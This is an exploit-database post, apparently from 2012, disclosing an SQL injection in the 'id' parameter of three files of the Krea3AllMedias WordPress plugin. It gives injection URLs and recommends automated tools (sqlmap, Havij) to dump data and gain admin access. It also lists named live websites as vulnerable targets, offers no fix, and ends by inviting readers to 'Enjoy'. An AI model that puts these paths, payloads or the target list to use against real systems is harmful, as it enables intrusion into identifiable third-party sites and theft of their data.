Home / exploits WordPress Krea3AllMedias SQL Injection
Posted on 13 September 2012
# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 # 0 _ __ __ __ 1 # 1 /' __ /'__` / \__ /'__` 0 # 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 # 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 # 0 / / / / \__/ \_ \_ / 1 # 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 # 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 # 1 \____/ >> Exploit database separated by exploit 0 # 0 /___/ type (local, remote, DoS, etc.) 1 # 1 1 # 0 [x] Official Website: http://www.1337day.com 0 # 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 # 0 0 # 1 ========================================== 1 # 0 0 # 0 1 # 1 dark-puzzle[at]live[at]fr 0 # 0 ========================================== 1 # 1 White Hat 1 # 0 Independant Pentester 0 # 1 exploit coder/bug researcher 0 # 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 # Title : Wordpress Plugins - Krea3AllMedias SQL Injection Vulnerability # Author : Dark-Puzzle (Souhail Hammou) # Date : 14th September 2012 # Risk : High # Vendor : www.krea3.fr # Tested On : Windows XP SP3 - Fr & Backtrack 5 R3 # Greetings : Inj3ct0rs - Offensive Security - Security Focus - Packetstorm Security . # Contact Me: www.facebook.com/dark-puzzle / dark-puzzle@live.fr ##################################################################################### Krea3AllMedias Wordpress Plugin is prone to an SQL Injection Vulnerability that can be exploited using an automated program . The 'id' parameter cannot be injected manually because it's impossible to detect the infected column with a Union+Select Request . Simply Because nothing is displayed in the webpage . So using an Automated tool can easily help you to inject DATA from the website and get admin access. I recommend you using : SQLmap for Linux & Havij For Windows . ##################################################################################### 'id' parameter is injectable in playlist.php , LineGallery.php , ArtGallery.php . ##################################################################################### Examples : http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1' http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/premium/ArtGallery.php?id=1' http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/premium/LineGallery.php?id=1' ##################################################################################### Live Examples : http://www.krea3.fr/wp-content/plugins/Krea3Allmedias/application/services/premium/LineGallery.php?id=5 http://www.restaurant-honfleur-alcyone.fr/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1 http://www.beuzeville-tourisme.com/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1 Admin Panel : http://www.example.com/wp-admin ##################################################################################### Solution : N/A ##################################################################################### Many Infected Websites . Enjoy !! #Datasec Team .
